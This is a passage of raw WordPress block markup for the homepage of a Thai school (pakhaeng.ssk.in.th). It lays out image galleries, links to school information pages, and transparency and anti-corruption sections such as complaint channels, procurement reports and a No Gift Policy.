b8%b4/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=476\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ-1024x353.png\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ร้องเรียนทุจริตประพฤติมิชอบ.png\",\"width\":750,\"height\":259},{\"id\":84,\"link\":\"https://nsschool.ac.th/home/%e0%b8%84%e0%b8%a7%e0%b8%b2%e0%b8%a1%e0%b8%84%e0%b8%b4%e0%b8%94%e0%b9%80%e0%b8%ab%e0%b9%87%e0%b8%99/\",\"alt\":\"\",\"url\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"customLink\":\"http://pakhaeng.ssk.in.th/?page_id=563\",\"linkTarget\":\"_blank\",\"linkSponsored\":\"\",\"thumbUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น-1024x353.jpg\",\"lightUrl\":\"https://nsschool.ac.th/wp-content/uploads/2024/06/ความคิดเห็น.jpg\",\"width\":750,\"height\":259}],\"kbVersion\":2} /-->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e9bcd64\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2603ad26\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"d4c24200\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/image {\"uniqueId\":\"273bf937\",\"mediaId\":30,\"sizeSlug\":\"full\",\"widthMobile\":\"300px\",\"alignmentMobile\":\"center\",\"blockVersion\":2} -->\n<figure class=\"gb-block-image gb-block-image-273bf937\"><img class=\"gb-image gb-image-273bf937\" src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/ผอ-1.png\" alt=\"\" title=\"ผอ 1\"/></figure>\n<!-- /wp:generateblocks/image -->\n\n<!-- wp:kadence/advancedbtn {\"uniqueID\":\"14_bc537f-5a\"} -->\n<div class=\"wp-block-kadence-advancedbtn kb-buttons-wrap kb-btns14_bc537f-5a\"><!-- wp:kadence/singlebtn {\"uniqueID\":\"14_1da0eb-4e\",\"text\":\"ติดต่อผู้อำนวยการโรงเรียน\",\"link\":\"http://pakhaeng.ssk.in.th/?page_id=469\",\"sizePreset\":\"small\",\"background\":\"#0a71ad\"} /--></div>\n<!-- /wp:kadence/advancedbtn --></div>\n<!-- /wp:group -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"1cb712a0\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#0a71ad\",\"backgroundColorHover\":\"#8ed1fc\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-1cb712a0 gb-button-text\"><strong>เกี่ยวกับโรงเรียน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:kadence/iconlist {\"listStyles\":[{\"size\":[16,\"\",\"\"],\"sizeType\":\"px\",\"lineHeight\":[\"\",\"\",\"\"],\"lineType\":\"px\",\"letterSpacing\":\"\",\"family\":\"\",\"google\":false,\"style\":\"\",\"weight\":\"\",\"variant\":\"\",\"subset\":\"\",\"loadGoogle\":true,\"color\":\"\",\"textTransform\":\"\"}],\"uniqueID\":\"14_add57c-9d\",\"listPadding\":[\"\",\"xxs\",\"\",\"xxs\"],\"icon\":\"fe_arrowRightCircle\"} -->\n<div class=\"wp-block-kadence-iconlist kt-svg-icon-list-items kt-svg-icon-list-items14_add57c-9d kt-svg-icon-list-columns-1 alignnone\"><ul class=\"kt-svg-icon-list\"><!-- wp:kadence/listitem {\"uniqueID\":\"14_745a05-5a\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_745a05-5a\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=650\" data-type=\"page\" data-id=\"650\">ข้อมูลพื้นฐาน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_1e894c-db\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_1e894c-db\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=643\">ประวัติโรงเรียน</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_95f155-a6\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_95f155-a6\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=609\" data-type=\"page\" data-id=\"609\">ข้อมูลสิ่งก่อสร้าง</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_3cdb23-c1\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_3cdb23-c1\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=656\" data-type=\"page\" data-id=\"656\">วิสัยทัศน์/พันธกิจ/เป้าประสงค์</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_92a3d1-5f\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_92a3d1-5f\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\">กรรมการสถานศึกษา</span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_225b86-42\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_225b86-42\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=469\">ข้อมูลผู้บริหาร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_e92ee9-59\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_e92ee9-59\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=605\" data-type=\"page\" data-id=\"605\">ข้อมูลบุคลากร</a></span></li>\n<!-- /wp:kadence/listitem -->\n\n<!-- wp:kadence/listitem {\"uniqueID\":\"14_91c788-64\"} -->\n<li class=\"wp-block-kadence-listitem kt-svg-icon-list-item-wrap kt-svg-icon-list-item-14_91c788-64\"><span data-name=\"USE_PARENT_DEFAULT_ICON\" data-stroke=\"USE_PARENT_DEFAULT_WIDTH\" data-class=\"kt-svg-icon-list-single\" class=\"kadence-dynamic-icon\"></span><span class=\"kt-svg-icon-list-text\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=496\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=496\">ข้อมูลนักเรียน</a></span></li>\n<!-- /wp:kadence/listitem --></ul></div>\n<!-- /wp:kadence/iconlist -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"5157985b\",\"isGrid\":true,\"gridId\":\"2603ad26\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"e5e0c341\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":503,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\"} -->\n<figure class=\"wp-block-image size-full\"><a href=\"http://eita.ssk.in.th/eit_admin.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Is-It-a-Gift-Instagram-Post.png\" alt=\"\" class=\"wp-image-503\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"9l7bo6vn\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showTaxonomy\":false,\"showTitle\":false,\"showContent\":false,\"showReadmore\":false,\"showPagination\":true,\"postsPerPage\":\"2\",\"headingText\":\"วิดีโอกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"headingHide\":false,\"category-terms\":[{\"label\":\"วิดีโอกิจกรรมโรงเรียน\",\"value\":\"%e0%b8%a7%e0%b8%b4%e0%b8%94%e0%b8%b5%e0%b9%82%e0%b8%ad%e0%b8%81%e0%b8%b4%e0%b8%88%e0%b8%81%e0%b8%a3%e0%b8%a3%e0%b8%a1%e0%b9%82%e0%b8%a3%e0%b8%87%e0%b9%80%e0%b8%a3%e0%b8%b5%e0%b8%a2%e0%b8%99\"}],\"headingBgColor\":\"#ff6900\"} /-->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"4b6444ee\",\"isDynamic\":true,\"blockVersion\":4,\"spacing\":{\"paddingTop\":\"30px\",\"paddingLeft\":\"10px\",\"paddingRight\":\"10px\"}} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"2467bce1\",\"columns\":2,\"horizontalGap\":30,\"verticalGap\":20,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"3094a446\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"25%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingBottom\":\"\"}} -->\n<!-- wp:group {\"layout\":{\"type\":\"constrained\"}} -->\n<div class=\"wp-block-group\"><!-- wp:generateblocks/button {\"uniqueId\":\"e4387b97\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-e4387b97 gb-button-text\"><strong>ข้อมูลพื้นฐาน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=546\">โครงสร้าง</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?post_type=popupbuilder&amp;p=328\">ข้อมูลผู้บริหาร</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=542\">อำนาจหน้าที่</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=362\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=362\">ข้อมูลการติดต่อ</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=355\" data-type=\"page\" data-id=\"355\">ข่าวประชาสัมพันธ์</a></strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=506\" data-type=\"link\" data-id=\"http://pakhaeng.ssk.in.th/?page_id=337\">Q&amp;A</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"306e037f\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-306e037f gb-button-text\"><strong>การบริหารงานและการใช้จ่ายงบประมาณ</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนยุทธศาสตร์หรือแผนพัฒนาหน่วยงาน</strong></td></tr><tr><td><strong>แผนและความก้าวหน้าในการดำเนินงานและการใช้งบประมาณประจำปี</strong></td></tr><tr><td><strong>รายงานผลการดำเนินงานประจำปี</strong></td></tr><tr><td><strong>คู่มือหรือแนวทางปฏิบัติงานของเจ้าหน้าที่</strong></td></tr><tr><td><strong>คู่มือแนวทางการให้บริการสำหรับผู้รับบริการหรือผู้มาติดต่อ</strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติการให้บริการ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=459\">E-Service</a></strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8a5736ca\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8a5736ca gb-button-text\"><strong>การจัดซื้อจัดจ้าง</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>รายการการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>ประกาศต่างๆ เกี่ยวกับการจัดซื้อจัดจ้างหรือจัดหาพัสดุ</strong></td></tr><tr><td><strong>ความก้าวหน้าการจัดซื้อจัดจ้างหรือการจัดหาพัสดุ</strong></td></tr><tr><td><strong>รายงานผลการจัดซื้อจัดจ้างหรือการจัดหาพัสดุประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8283a353\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8283a353 gb-button-text\"><strong>การบริหารและพัฒนาทรัพยากรบุคคล</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=566\" data-type=\"page\" data-id=\"566\">แผนการบริหารและพัฒนาทรัพยากรบุคคล</a></strong></td></tr><tr><td><strong>รายงานผลการบริหารและพัฒนาทรัพยากรบุคคลประจำปี</strong></td></tr><tr><td><strong>ประมวลจริยธรรมสำหรับเจ้าหน้าที่ของรัฐ</strong></td></tr><tr><td><strong>การขับเคลื่อนจริยธรรม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"8e160f87\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-8e160f87 gb-button-text\"><strong>การส่งเสริมความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แนวปฏิบัติการจัดการเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong><a href=\"http://pakhaeng.ssk.in.th/?page_id=476\">ช่องทางแจ้งเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</a></strong></td></tr><tr><td><strong>ข้อมูลเชิงสถิติเรื่องร้องเรียนการทุจริตและประพฤติมิชอบ</strong></td></tr><tr><td><strong>การเปิดโอกาสให้เกิดการมีส่วนร่วม</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"dd227e0e\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-dd227e0e gb-button-text\"><strong>การดำเนินการเพื่อป้องกันการทุจริตในประเด็นสินบน</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>ประกาศเจตนารมณ์นโยบาย No Gift Policy จากการปฏิบัติหน้าที่</strong></td></tr><tr><td><strong>การสร้างวัฒนธรรม&nbsp; No Gift Policy</strong></td></tr><tr><td><strong>รายงานผลตามนโยบาย No Gift Policy</strong></td></tr><tr><td><strong>รายงานการรับทรัพย์สินหรือประโยชน์อื่นใดโดยธรรมจรรยา</strong></td></tr><tr><td><strong>การประเมินความเสี่ยงการทุจริตในประเด็นที่เกี่ยวข้องกับสินบน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงและประพฤติมิชอบประจำปี</strong></td></tr></tbody></table></figure>\n<!-- /wp:table -->\n\n<!-- wp:generateblocks/button {\"uniqueId\":\"85986834\",\"blockVersion\":4,\"display\":\"flex\",\"flexDirection\":\"row\",\"alignItems\":\"center\",\"columnGap\":\"0.5em\",\"typography\":{\"fontSize\":\"17px\",\"fontFamily\":\"Kanit\"},\"fontFamilyFallback\":\"sans-serif\",\"googleFont\":true,\"googleFontVariants\":\"100, 100italic, 200, 200italic, 300, 300italic, regular, italic, 500, 500italic, 600, 600italic, 700, 700italic, 800, 800italic, 900, 900italic\",\"spacing\":{\"paddingTop\":\"8px\",\"paddingRight\":\"10px\",\"paddingBottom\":\"8px\",\"paddingLeft\":\"10px\",\"marginBottom\":\"3px\"},\"borders\":{\"borderTopLeftRadius\":\"3px\",\"borderTopRightRadius\":\"3px\",\"borderBottomRightRadius\":\"3px\",\"borderBottomLeftRadius\":\"3px\"},\"backgroundColor\":\"#235B95\",\"backgroundColorHover\":\"#47be9d\",\"textColor\":\"#ffffff\",\"textColorHover\":\"#ffffff\",\"iconStyles\":{\"height\":\"1em\",\"width\":\"1em\"}} -->\n<span class=\"gb-button gb-button-85986834 gb-button-text\"><strong>การส่งเสริมคุณธรรมและความโปร่งใส</strong></span>\n<!-- /wp:generateblocks/button -->\n\n<!-- wp:table {\"hasFixedLayout\":false,\"className\":\"is-style-stripes\",\"style\":{\"typography\":{\"fontSize\":\"15px\"}}} -->\n<figure class=\"wp-block-table is-style-stripes\" style=\"font-size:15px\"><table><tbody><tr><td><strong>แผนการปฏิบัติการป้องกันการทุจริต</strong></td></tr><tr><td><strong>รายงานการดำเนินการป้องกันการทุจริตประจำปี</strong></td></tr><tr><td><strong>มาตรการส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr><tr><td><strong>รายงานผลการดำเนินการเพื่อส่งเสริมคุณธรรมและความโปร่งใสภายในหน่วยงาน</strong></td></tr></tbody></table></figure>\n<!-- /wp:table --></div>\n<!-- /wp:group -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"07462550\",\"isGrid\":true,\"gridId\":\"2467bce1\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"75%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:contentviews/list1 {\"blockId\":\"bohtnagp\",\"gridGap\":{\"md\":0},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"showThumbnail\":false,\"showTaxonomy\":false,\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"showPagination\":true,\"titleTag\":\"h6\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวประชาสัมพันธ์\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"label\":\"ข่าวประชาสัมพันธ์\",\"value\":\"pr\"}],\"headingBgColor\":\"#ff6900\",\"titleHoverColor\":\"#ff6900\",\"titleBgColor\":\"#ffffff\",\"titleHoverBgColor\":\"#ffffff\",\"titleWeight\":\"500\",\"titlefStyle\":\"\",\"titleTran\":\"\",\"titleBorderStyle\":\"none\",\"titlefSize\":{\"md\":18}} /-->\n\n<!-- wp:contentviews/grid1 {\"blockId\":\"7dr8k85x\",\"whichLayout\":\"layout2\",\"columns\":{\"md\":2,\"sm\":2,\"xs\":1},\"taxonomy\":[{\"label\":\"หมวดหมู่\",\"value\":\"category\"}],\"fieldsPosition\":[\"showThumbnail\",\"showTitle\",\"showContent\",\"showReadmore\",\"showMeta\",\"showCustomField\",\"showWooPrice\",\"showWooATC\",\"showWooRating\",\"showWooHook\"],\"showContent\":false,\"showReadmore\":false,\"showMeta\":true,\"metaWhich\":[{\"value\":\"date\",\"label\":\"Date\"},{\"value\":\"author\",\"label\":\"Author\"},{\"value\":\"comment\",\"label\":\"Comment\"}],\"metaSeparator\":\"|\",\"showPagination\":true,\"imgSize\":\"large\",\"thumbnailHeight\":{\"md\":250,\"xs\":100},\"thumbnailHeightUnits\":{\"xs\":\"%\"},\"thumbnailEffect\":\"cveffect-darken\",\"postsPerPage\":\"4\",\"headingText\":\"ข่าวกิจกรรมโรงเรียน\",\"headingStyle\":\"heading5\",\"category-terms\":[{\"